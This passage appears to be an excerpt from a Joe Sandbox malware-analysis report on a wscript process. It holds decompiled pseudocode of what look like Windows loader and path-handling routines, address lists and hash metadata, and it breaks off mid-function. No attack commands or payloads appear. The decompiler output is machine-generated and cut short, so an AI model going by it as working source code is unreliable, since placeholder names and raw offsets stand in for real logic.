									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0598B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E05983D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0598B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x05964128
0x05964135
0x0596413c
0x05964141
0x05964145
0x05964147
0x0596414e
0x05964151
0x05964159
0x0596415c
0x05964160
0x05964164
0x05964168
0x0596416c
0x0596417f
0x05964181
0x0596446a
0x0596446a
0x0596418c
0x05964195
0x05964199
0x05964432
0x05964439
0x0596443d
0x05964442
0x05964447
0x00000000
0x0596419f
0x059641a3
0x059641b1
0x059641b9
0x059641bd
0x059645db
0x059645db
0x00000000
0x059641c3
0x059641c3
0x059641ce
0x059641d4
0x059ae138
0x059ae13e
0x059ae169
0x059ae16d
0x059ae19e
0x059ae16f
0x059ae16f
0x059ae175
0x059ae179
0x059ae18f
0x059ae193
0x00000000
0x059ae199
0x00000000
0x059ae199
0x059ae193
0x00000000
0x00000000
0x00000000
0x059641da
0x059641da
0x059641df
0x059641e4
0x059641ec
0x05964203
0x05964207
0x059ae1fd
0x05964222
0x05964226
0x059ae1f3
0x059ae1f3
0x0596422c
0x0596422c
0x05964233
0x059ae1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x05964239
0x05964239
0x05964239
0x05964239
0x05964233
0x05964226
0x059641ee
0x059641ee
0x059641f4
0x05964575
0x059ae1b1
0x059ae1b1
0x00000000
0x0596457b
0x0596457b
0x05964582
0x059ae1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x05964588
0x05964588
0x0596458c
0x059ae1c4
0x059ae1c4
0x00000000
0x05964592
0x05964592
0x05964599
0x059ae1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0596459f
0x0596459f
0x059645a3
0x059ae1d7
0x059ae1e4
0x00000000
0x059645a9
0x059645a9
0x059645b0
0x059ae1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x059645b6
0x059645b6
0x059645b6
0x00000000
0x059645b6
0x059645b0
0x059645a3
0x05964599
0x0596458c
0x05964582
0x00000000
0x00000000
0x00000000
0x00000000
0x059641f4
0x0596423e
0x05964241
0x059645c0
0x059645c4
0x00000000
0x059645ca
0x059645ca
0x00000000
0x059ae207
0x059ae20f
0x00000000
0x00000000
0x00000000
0x00000000
0x059645d1
0x00000000
0x00000000
0x059645ca
0x00000000
0x05964247
0x05964247
0x05964247
0x05964249
0x05964249
0x05964249
0x05964251
0x05964251
0x05964257
0x0596425f
0x0596426e
0x05964270
0x0596427a
0x059ae219
0x059ae219
0x05964280
0x05964282
0x05964456
0x059645ea
0x00000000
0x059645f0
0x059ae223
0x00000000
0x059ae223
0x0596445c
0x0596445c
0x00000000
0x0596445c
0x00000000
0x05964288
0x0596428c
0x059ae298
0x05964292
0x05964292
0x0596429e
0x059642a3
0x059642a7
0x059642ac
0x059ae22d
0x059642b2
0x059642b2
0x059642b9
0x059642bc
0x059642c2
0x059642ca
0x059642cd
0x059642cd
0x059642d4
0x0596433f
0x0596433f
0x059642d6
0x059642d6
0x059642d9
0x059642dd
0x059642eb
0x059ae23a
0x059642f1
0x05964305
0x0596430d
0x05964315
0x05964318
0x0596431f
0x05964322
0x0596432e
0x0596433b
0x0596433b
0x00000000
0x0596432e
0x059642eb
0x0596434c
0x0596434e
0x05964352
0x05964359
0x0596435e
0x05964361
0x0596436e
0x0596438a
0x0596438e
0x05964396
0x0596439e
0x059643a1
0x059643ad
0x059643bb
0x059643bb
0x059643ad
0x0596436e
0x059643bf
0x059643c5
0x05964463
0x05964463
0x059643ce
0x059643d5
0x059643d9
0x059643df
0x05964475
0x05964479
0x05964491
0x05964491
0x05964479
0x059643e5
0x059643eb
0x059643f4
0x059643f6
0x059643f9
0x059643fc
0x059643ff
0x059644e8
0x059644ed
0x059644f3
0x059ae247
0x00000000
0x059644f9
0x05964504
0x05964508
0x0596450f
0x059ae269
0x00000000
0x05964515
0x05964519
0x05964531
0x05964534
0x05964537
0x0596453e
0x05964541
0x0596454a
0x059ae255
0x059ae255
0x059ae25b
0x059ae25e
0x059ae261
0x059ae261
0x05964555
0x05964559
0x0596455d
0x059ae26d
0x059ae270
0x059ae274
0x059ae27a
0x059ae27d
0x059ae28e
0x059ae28e
0x05964563
0x05964563
0x05964569
0x05964569
0x00000000
0x0596455d
0x0596450f
0x00000000
0x059644f3
0x059643ff
0x05964405
0x05964405
0x05964405
0x059642ac
0x0596428c
0x05964282
0x05964407
0x0596440d
0x059ae2af
0x059ae2af
0x05964413
0x05964413
0x00000000
0x059641d4
0x00000000
0x059641c3
0x059641bd
0x05964415
0x05964415
0x05964416
0x05964417
0x05964429
0x0596416e
0x0596416e
0x05964175
0x05964498
0x0596449f
0x059ae12d
0x00000000
0x059ae133
0x00000000
0x059ae133
0x059644a5
0x059644a5
0x059644aa
0x00000000
0x059644bb
0x059644ca
0x059644d6
0x059644d7
0x059644d8
0x059644e3
0x059644e3
0x059644aa
0x0596417b
0x0596417b
0x0596417b
0x00000000
0x0596417b
0x05964175
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d928b9f5581b6b8bfe4f4e055df5f8fcd32f7c0569ae66406383d0994c311407
Instruction ID: 7b124bbdd8a878732a59025192bbdfabc4e9c97a755ed5753aa4cf228622216f
Opcode Fuzzy Hash: d928b9f5581b6b8bfe4f4e055df5f8fcd32f7c0569ae66406383d0994c311407
Instruction Fuzzy Hash: E7F170716082118FCB14DF99C584A3AB7E6FF88754F15492EF88ACB250E734D859CB92

Uniqueness

Uniqueness Score: -1.00%

Function 059720A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E059720A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x5a38714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E05972EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E05972EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E059458EC(_t240);
									_t221 =  *0x5a35cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x5a35cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E05984A2C(0x5a36e40, 0x5984b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E05967D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x5925c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0597F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0597F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E059C7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L05962400(_t267 + 0x20);
															}
															L05962400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E05972397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E05962280(_t134, 0x5a38608);
									__eflags =  *0x5a36e48 - _t253; // 0x2a7b2c0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E0595FFB0(_t198, _t241, 0x5a38608);
										__eflags = _t253;
										if(_t253 != 0) {
											L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x5a36e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x5a38608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E05976B90(_t210,  &_v64);
										_t262 =  *0x5a38608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0597E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E059897C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0598006A(0x5a38608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x5a38608);
												E0598B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x5a36904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x5a36e48; // 0x2a7b2c0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E0595FFB0(_t198, _t240, 0x5a38608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E059800C2(0x5a38608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x059720a0
0x059720a8
0x059720ad
0x059720b3
0x059720b8
0x059720c2
0x059720c7
0x059720cb
0x059720d2
0x05972263
0x05972266
0x059b5836
0x059b5836
0x00000000
0x0597226c
0x0597226c
0x05972270
0x05972274
0x059720e2
0x059720e2
0x059720e6
0x059720ee
0x059b57dc
0x059b57de
0x059b57ec
0x059b57ec
0x059b57f1
0x059b57f3
0x059b57f8
0x00000000
0x059b57f8
0x059b57e0
0x059b57e4
0x059b57ea
0x00000000
0x00000000
0x00000000
0x059b57ea
0x059720f4
0x059720f4
0x059720f8
0x059720f8
0x059720fc
0x05972100
0x05972106
0x05972201
0x05972206
0x0597220b
0x0597220e
0x059722a9
0x059722ac
0x00000000
0x00000000
0x059722b2
0x059722b5
0x059b5801
0x059b5806
0x00000000
0x00000000
0x059b5810
0x059b5815
0x059b5818
0x00000000
0x00000000
0x059b581e
0x059722bb
0x059722bb
0x05972218
0x05972218
0x0597221c
0x05972220
0x05972222
0x059722c2
0x059722c4
0x059722dc
0x059722dc
0x059722e1
0x00000000
0x00000000
0x00000000
0x059722e7
0x059722c8
0x059722cd
0x059722d3
0x059722d6
0x059b5823
0x059b5825
0x059b5827
0x00000000
0x00000000
0x059b582d
0x00000000
0x059b582d
0x00000000
0x05972228
0x05972228
0x00000000
0x05972228
0x05972222
0x05972214
0x05972214
0x00000000
0x05972114
0x05972114
0x05972114
0x0597211a
0x0597211c
0x05972348
0x0597234d
0x059b5840
0x059b5845
0x059b5848
0x059b584e
0x059b584e
0x059b5848
0x05972353
0x05972355
0x05972388
0x05972388
0x05972368
0x0597236a
0x0597236c
0x0597238f
0x00000000
0x0597236e
0x0597236e
0x0597218e
0x0597218e
0x05972191
0x05972195
0x059b5a03
0x059b5a06
0x059b5a0c
0x059b5a0f
0x059b5a11
0x059b5a13
0x059b5a13
0x059b5a19
0x059b5a1f
0x00000000
0x0597219b
0x0597219b
0x059721a0
0x05972282
0x05972284
0x05972284
0x05972284
0x05972284
0x059721a6
0x059721a9
0x059721ac
0x059721ae
0x059721b3
0x0597228b
0x05972290
0x05972379
0x05972296
0x05972298
0x05972298
0x05972290
0x059721b9
0x059721be
0x059722a2
0x059722a2
0x059721c4
0x059721c8
0x059721cc
0x059721d0
0x059721d4
0x059721de
0x059721e3
0x059b5a29
0x059b5a2c
0x00000000
0x00000000
0x059b5a3b
0x00000000
0x059721e9
0x059721e9
0x059721e9
0x059721ee
0x059721f1
0x059b5a45
0x059b5a4b
0x059b5a52
0x059b5a58
0x059b5a5d
0x059b5a5f
0x059b5a71
0x059b5a61
0x059b5a6a
0x059b5a6a
0x059b5a76
0x059b5a79
0x059b5a7f
0x059b5a83
0x059b5a85
0x059b5a87
0x059b5a87
0x059b5a8c
0x059b5a91
0x059b5a97
0x059b5a9f
0x059b5aa0
0x059b5aa1
0x059b5aa6
0x059b5aab
0x059b5ab1
0x059b5ab3
0x059b5ab9
0x059b5aca
0x059b5ad4
0x059b5ad4
0x059b5ade
0x059b5ade
0x059b5aab
0x059b5a79
0x059b5a52
0x059721f7
0x059721f9
0x059721fe
0x059721fe
0x059721e3
0x05972195
0x0597236c
0x05972122
0x05972122
0x05972124
0x05972231
0x05972236
0x05972236
0x05972238
0x05972238
0x05972240
0x05972242
0x05972244
0x059b59fc
0x0597218c
0x0597218c
0x00000000
0x0597218c
0x0597224a
0x0597224f
0x05972256
0x05972304
0x05972309
0x0597230f
0x0597231e
0x0597231e
0x0597231e
0x05972320
0x05972325
0x0597232a
0x0597232c
0x0597233e
0x0597233e
0x00000000
0x0597232c
0x05972311
0x05972317
0x0597231a
0x0597231c
0x05972380
0x05972380
0x05972380
0x05972384
0x00000000
0x00000000
0x05972386
0x00000000
0x0597231c
0x0597225c
0x0597225c
0x00000000
0x0597225c
0x0597212a
0x05972134
0x05972138
0x0597213d
0x059b5858
0x059b5863
0x059b5863
0x059b5867
0x059b586a
0x00000000
0x00000000
0x059b586c
0x059b586c
0x059b5871
0x059b5875
0x059b5877
0x059b5997
0x059b599c
0x059b59a1
0x059b59a7
0x059b59a7
0x00000000
0x059b59a7
0x059b587d
0x00000000
0x059b588b
0x059b588b
0x059b5890
0x059b5892
0x059b5894
0x059b5899
0x059b589b
0x059b58a0
0x059b58a0
0x059b58aa
0x059b58b2
0x059b58b6
0x059b58be
0x059b58c6
0x059b58c9
0x059b590d
0x059b5917
0x059b591a
0x059b591c
0x059b5920
0x059b5928
0x059b592a
0x059b592c
0x059b592e
0x059b592e
0x059b58cb
0x059b58cd
0x059b58d8
0x059b58e0
0x059b58f4
0x059b58fe
0x059b58fe
0x059b593a
0x059b593e
0x059b5940
0x059b5942
0x00000000
0x059b5944
0x059b5944
0x059b5949
0x059b594e
0x059b594e
0x059b5953
0x059b595b
0x059b5976
0x059b5976
0x059b597a
0x059b597f
0x00000000
0x00000000
0x00000000
0x00000000
0x059b5981
0x059b5981
0x059b5981
0x059b5983
0x059b5988
0x059b598d
0x059b5991
0x059b5991
0x00000000
0x059b595d
0x059b595d
0x059b5963
0x059b5965
0x00000000
0x00000000
0x00000000
0x00000000
0x059b5967
0x059b5967
0x059b596b
0x059b596d
0x00000000
0x00000000
0x059b596f
0x059b5971
0x059b5971
0x059b5974
0x00000000
0x00000000
0x00000000
0x059b5974
0x00000000
0x059b5967
0x059b595b
0x059b5942
0x059b5863
0x05972143
0x05972143
0x05972149
0x0597214f
0x059722f1
0x059722f6
0x00000000
0x05972173
0x05972173
0x0597217d
0x05972181
0x05972186
0x059b59ae
0x059b59b2
0x059b59b5
0x059b59b7
0x059b59ba
0x059b59cd
0x059b59d1
0x059b59d5
0x059b59d9
0x059b59db
0x00000000
0x00000000
0x059b59dd
0x059b59dd
0x059b59e1
0x059b59e4
0x059b59e7
0x059b59ee
0x059b59ee
0x059b59f3
0x059b59f3
0x00000000
0x05972186
0x0597214f
0x05972106
0x05972266
0x059720d8
0x059720da
0x059720e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174b1e47203d60ee8be164b28a538867f6f5ac711189543f64ba74f79bde53a5
Instruction ID: d53a1d420a22ca44297da0ed4fca7ba68b4223d2b3f9e1878c3729dc9cea475d
Opcode Fuzzy Hash: 174b1e47203d60ee8be164b28a538867f6f5ac711189543f64ba74f79bde53a5
Instruction Fuzzy Hash: BEF13574A183459FEB25CF28C940B7A77EABFC5724F05891EF8959B280E774D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0595D5E0 Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0595D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x5a3d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E05956600(0x5a352d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x5a37b9c; // 0x0
							_t281 = L05964620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0598F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x5a37b90; // 0x77880000
								if(_t384 == 0) {
									_t353 =  *0x5a37b8c; // 0x2a72b90
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E05962280(_t200, 0x5a384d8);
									_t277 =  *0x5a385f4; // 0x2a73080
									_t351 =  *0x5a385f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
